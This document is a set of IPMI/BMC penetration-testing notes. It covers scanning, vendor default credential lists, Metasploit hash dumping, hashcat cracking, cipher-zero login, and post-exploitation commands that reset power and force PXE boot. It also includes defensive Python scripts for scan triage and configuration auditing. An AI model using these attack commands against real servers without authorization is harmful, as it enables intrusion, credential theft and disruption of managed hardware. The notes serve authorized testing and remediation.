# IPMI Pentesting Notes

## Protocol Overview

### Basic Information

* **Port**: UDP 623
* **Protocol Type**: Hardware management protocol
* **Purpose**: Remote server management and monitoring
* **Security**: Various authentication methods, often poorly configured

### Key Components

1. **BMC (Baseboard Management Controller)**
   * Embedded Linux system
   * Independent of host OS
   * Manages hardware directly
2. **Common Implementations**
   * HP iLO (Integrated Lights Out)
   * Dell iDRAC
   * Supermicro IPMI
   * IBM IMM

## Initial Enumeration

### Port Scanning

```bash
# Basic UDP scan
sudo nmap -sU -p 623 <target>

# Version detection
sudo nmap -sU -p 623 -sV <target>

# IPMI-specific scripts (quote the glob so the shell does not expand it)
sudo nmap -sU -p 623 --script 'ipmi-*' <target>
```

### Version Detection

```bash
# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target>
run

# Using nmap
sudo nmap -sU --script ipmi-version -p 623 <target>

# Using ipmitool (needs valid credentials; reports firmware and IPMI version)
ipmitool -I lanplus -H <target> -p 623 -U <user> -P <password> mc info
```

## Default Credentials

### Common Defaults

| Vendor     | Username      | Password        |
| ---------- | ------------- | --------------- |
| Dell iDRAC | root          | calvin          |
| HP iLO     | Administrator | <8-char random> |
| Supermicro | ADMIN         | ADMIN           |
| IBM IMM    | USERID        | PASSW0RD        |

### Testing Default Access

```bash
# Using ipmitool
ipmitool -I lanplus -H <target> -U root -P calvin chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```

## Password Attacks

### Hash Dumping

```bash
# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Using Python
mkdir output
python3 ipmipwner.py --host <target> --output ./output
```

### Cracking Hashes

```bash
# IPMI v2.0 RAKP HMAC-SHA1 hashes
hashcat -m 7300 hashes.txt wordlist.txt

# Custom mask for HP iLO defaults (8 chars, uppercase + numbers)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

# Using John
john --format=rakp hashes.txt
```

## Common NSE Scripts

```bash
# Run all IPMI scripts (quote the glob so the shell does not expand it)
sudo nmap -sU -p 623 --script 'ipmi-*' <target>

# Important individual scripts
sudo nmap -sU -p 623 --script ipmi-version <target>      # Version detection
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>  # Cipher zero auth
sudo nmap -sU -p 623 --script ipmi-brute <target>        # Brute force
```
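The scans above are easier to report on, and to hand to the BMC owners for remediation, when nmap's XML output (`-oX`) is parsed rather than read off the terminal. The following triage script is an added example, not part of the original notes or of nmap: it lists every host that answered on UDP/623 with the IPMI version and cipher-zero state reported by the `ipmi-version` and `ipmi-cipher-zero` scripts, and treats hosts that nmap could only mark `open|filtered` as unconfirmed. `SAMPLE_XML` and its addresses are constructed in nmap's output layout, not a real scan.

```python
"""Triage nmap XML output for exposed IPMI interfaces (added example).

Reads the XML written by
  nmap -sU -p 623 --script 'ipmi-version,ipmi-cipher-zero' -oX scan.xml <range>
and builds a BMC inventory with version and cipher-zero status per host.
SAMPLE_XML below is a constructed sample in nmap's layout, not a captured scan.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sU -p 623 --script ipmi-version,ipmi-cipher-zero -oX scan.xml 10.0.0.0/29">
  <host><address addr="10.0.0.5" addrtype="ipv4"/><ports>
    <port protocol="udp" portid="623"><state state="open" reason="udp-response"/>
      <service name="asf-rmcp" method="table"/>
      <script id="ipmi-version" output="&#10;  Version: IPMI-2.0&#10;  PassAuth: auth_user, non_null_user">
        <elem key="Version">IPMI-2.0</elem></script>
      <script id="ipmi-cipher-zero" output="&#10;  VULNERABLE:&#10;  IPMI 2.0 RAKP Cipher Zero Authentication Bypass&#10;    State: VULNERABLE"/>
    </port></ports></host>
  <host><address addr="10.0.0.6" addrtype="ipv4"/><ports>
    <port protocol="udp" portid="623"><state state="open" reason="udp-response"/>
      <service name="asf-rmcp" method="table"/>
      <script id="ipmi-version" output="&#10;  Version: IPMI-2.0"/>
      <script id="ipmi-cipher-zero" output="&#10;  NOT VULNERABLE"/>
    </port></ports></host>
  <host><address addr="10.0.0.7" addrtype="ipv4"/><ports>
    <port protocol="udp" portid="623"><state state="open|filtered" reason="no-response"/>
      <service name="asf-rmcp" method="table"/>
    </port></ports></host>
</nmaprun>
"""


def parse_ipmi_scan(xml_text):
    """Return one record per host that nmap reported on UDP/623."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            if port.get("protocol") != "udp" or port.get("portid") != "623":
                continue
            rec = {"host": addr.get("addr"),
                   "state": port.find("state").get("state"),
                   "version": None,      # None = ipmi-version produced nothing
                   "cipher_zero": None}  # None = not tested / no answer
            for script in port.findall("script"):
                out = script.get("output", "")
                if script.get("id") == "ipmi-version":
                    # Prefer the structured <elem>; fall back to the text output.
                    elem = script.find("elem[@key='Version']")
                    m = re.search(r"Version:\s*(\S+)", out)
                    rec["version"] = elem.text if elem is not None else (m.group(1) if m else None)
                elif script.get("id") == "ipmi-cipher-zero":
                    # nmap's vulns library prints "NOT VULNERABLE" or "VULNERABLE:".
                    rec["cipher_zero"] = "VULNERABLE" in out and "NOT VULNERABLE" not in out
            records.append(rec)
    return records


def triage(records):
    """Confirmed cipher-zero hosts first, then confirmed BMCs, then unconfirmed ones."""
    rank = {True: 0, False: 1, None: 2}
    return sorted(records, key=lambda r: (rank[r["cipher_zero"]], r["host"]))


if __name__ == "__main__":
    for r in triage(parse_ipmi_scan(SAMPLE_XML)):
        flag = {True: "CIPHER-ZERO", False: "ok", None: "unconfirmed"}[r["cipher_zero"]]
        print(f"{r['host']:<12} {r['state']:<14} {r['version'] or '-':<9} {flag}")
```

An `open|filtered` result only means nothing answered the probe; script output appears only when the BMC replied, so such hosts need a second look (for example with `-sV` or from the management network) before they are written off as not running IPMI.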

## Exploitation Techniques

### Cipher Zero Authentication

```bash
# Check for cipher zero
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>

# Exploit using ipmitool
ipmitool -I lanplus -H <target> -U '' -P '' -C 0 chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <target>
run
```

### RAKP Authentication Bypass

This is strictly a hash disclosure rather than a bypass: during the IPMI 2.0 RAKP handshake (CVE-2013-4787) the BMC returns an HMAC-SHA1 keyed with the user's password before authentication completes, so the hash can be recovered and cracked offline. Only a strong password protects a BMC that has not been patched or isolated on a management network.

```bash
# Dump RAKP hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Offline cracking
hashcat -m 7300 rakp.txt wordlist.txt
```

## Post Exploitation

### Information Gathering

```bash
# Get system info
ipmitool -I lanplus -H <target> -U username -P password fru print

# Get sensor data
ipmitool -I lanplus -H <target> -U username -P password sensor list

# Get user list
ipmitool -I lanplus -H <target> -U username -P password user list
```

### System Control

```bash
# Power operations
ipmitool -I lanplus -H <target> -U username -P password chassis power status
ipmitool -I lanplus -H <target> -U username -P password chassis power reset

# Boot device control
ipmitool -I lanplus -H <target> -U username -P password chassis bootdev pxe
```

## Common Vulnerabilities

1. **Authentication Issues**:
   * Default credentials
   * Cipher Zero authentication
   * RAKP authentication bypass
   * Weak password policies
2. **Configuration Problems**:
   * Exposed IPMI interfaces
   * Outdated firmware
   * Missing patches
   * Weak network restrictions
3. **Known CVEs**:
   * CVE-2013-4786 (Cipher Zero)
   * CVE-2013-4787 (IPMI 2.0 RAKP Authentication)
   * Multiple HP iLO vulnerabilities
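The authentication and configuration problems listed above can be checked from the BMC's own settings, which is how an owner verifies a fix after an engagement. The audit below is an added example (not from these notes or from ipmitool): it parses the text that `ipmitool -I lanplus -H <bmc> -U <user> -P <pass> lan print 1` and `... user list 1` return and flags cipher suite 0 being usable, IPMI 1.5 auth type NONE enabled, an anonymous (empty-name) user allowed to send IPMI messages, and the vendor default usernames from the Default Credentials table still enabled on the LAN channel. Both sample outputs and the IP address in them are constructed in ipmitool's layout.

```python
"""Audit a BMC's lan/user configuration for the weaknesses above (added example).

Parses constructed samples of `ipmitool lan print 1` and `ipmitool user list 1`
output; run it against the real output of a BMC you administer.
"""
import re

LAN_PRINT_SAMPLE = """\
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Operator : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
                        : OEM      : MD2 MD5 PASSWORD
IP Address              : 10.0.0.5
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     a=ADMIN
"""

USER_LIST_SAMPLE = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   root             true    true       true       ADMINISTRATOR
3   ADMIN            true    false      false      NO ACCESS
4   ops-oncall       true    true       true       OPERATOR
"""

# Usernames from the Default Credentials table above (compared case-insensitively).
DEFAULT_USERNAMES = {"root", "administrator", "admin", "userid"}


def parse_lan_print(text):
    """Extract per-level auth types, supported suites and the 15-char privilege map."""
    cfg = {"auth_enable": {}, "cipher_suites": [], "priv_max": None}
    key = None
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s*:\s*(.*)$", line)      # "Key   : value"
        if m:
            key, value = m.group(1), m.group(2)
        else:
            m = re.match(r"^\s*:\s*(.*)$", line)         # "      : continuation"
            if not m or key is None:
                continue
            value = m.group(1)
        if key == "Auth Type Enable":
            lm = re.match(r"(\w+)\s*:\s*(.*)", value)      # "User : NONE MD2 ..."
            if lm:
                cfg["auth_enable"][lm.group(1)] = lm.group(2).split()
        elif key == "RMCP+ Cipher Suites":
            cfg["cipher_suites"] = [int(x) for x in value.split(",") if x.strip().isdigit()]
        elif key == "Cipher Suite Priv Max" and cfg["priv_max"] is None:
            cfg["priv_max"] = value.strip()   # position N = max privilege for suite N
    return cfg


def parse_user_list(text):
    """Parse `user list` rows; an empty Name column is the anonymous user."""
    row = re.compile(r"^(\d+)\s+(\S*)\s+(true|false)\s+(true|false)\s+(true|false)\s+(.+?)\s*$")
    users = []
    for line in text.splitlines():
        m = row.match(line)
        if m:
            uid, name, _callin, _link, ipmi_msg, priv = m.groups()
            users.append({"id": int(uid), "name": name,
                          "ipmi_msg": ipmi_msg == "true", "priv": priv})
    return users


def audit(lan_cfg, users):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    pm = lan_cfg["priv_max"] or ""
    if pm and pm[0] != "X":
        findings.append(f"cipher suite 0 enabled up to privilege '{pm[0]}' (CVE-2013-4786)")
    for level, types in lan_cfg["auth_enable"].items():
        if "NONE" in types:
            findings.append(f"IPMI 1.5 auth type NONE enabled for {level} level")
    for u in users:
        if not u["ipmi_msg"] or u["priv"] == "NO ACCESS":
            continue   # account cannot be used over the LAN channel
        if u["name"] == "":
            findings.append(f"anonymous user (ID {u['id']}) can send IPMI messages as {u['priv']}")
        elif u["name"].lower() in DEFAULT_USERNAMES:
            findings.append(f"vendor default username '{u['name']}' (ID {u['id']}) enabled as {u['priv']}")
    return findings


if __name__ == "__main__":
    for f in audit(parse_lan_print(LAN_PRINT_SAMPLE), parse_user_list(USER_LIST_SAMPLE)):
        print("FINDING:", f)
```

The `Cipher Suite Priv Max` string is read positionally (character N is the maximum privilege granted to cipher suite N), so a non-`X` first character means suite 0 is accepted regardless of what the `RMCP+ Cipher Suites` list says; the fix on most BMCs is to set that position to `X` and to disable or rename the default accounts rather than only changing their passwords.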

## Response Codes and Messages

| Code | Meaning           |
| ---- | ----------------- |
| 0x00 | Success           |
| 0xC0 | Node Busy         |
| 0xC1 | Invalid Command   |
| 0xC3 | Timeout           |
| 0xC4 | Out of Space      |
| 0xC5 | Invalid Data      |
| 0xFF | Unspecified Error |

## Best Practices for Pentesting

1. **Initial Reconnaissance**:
   * Port discovery
   * Version detection
   * Default credential testing
   * Cipher support checking
2. **Deep Enumeration**:
   * User enumeration
   * Hash dumping
   * Vulnerability scanning
   * Configuration analysis
3. **Documentation**:
   * Version information
   * Found credentials
   * Vulnerable configurations
   * Successful exploits
4. **Risk Assessment**:
   * Physical access implications
   * Network exposure
   * Credential security
   * Patch status

## Common Tools Summary

1. **Enumeration**:
   * nmap
   * ipmitool
   * Metasploit modules
   * Custom Python scripts
2. **Exploitation**:
   * Metasploit
   * hashcat
   * John the Ripper
   * ipmitool
3. **Post-Exploitation**:
   * ipmitool
   * IPMI management interfaces
   * Custom scripts
   * Web interfaces
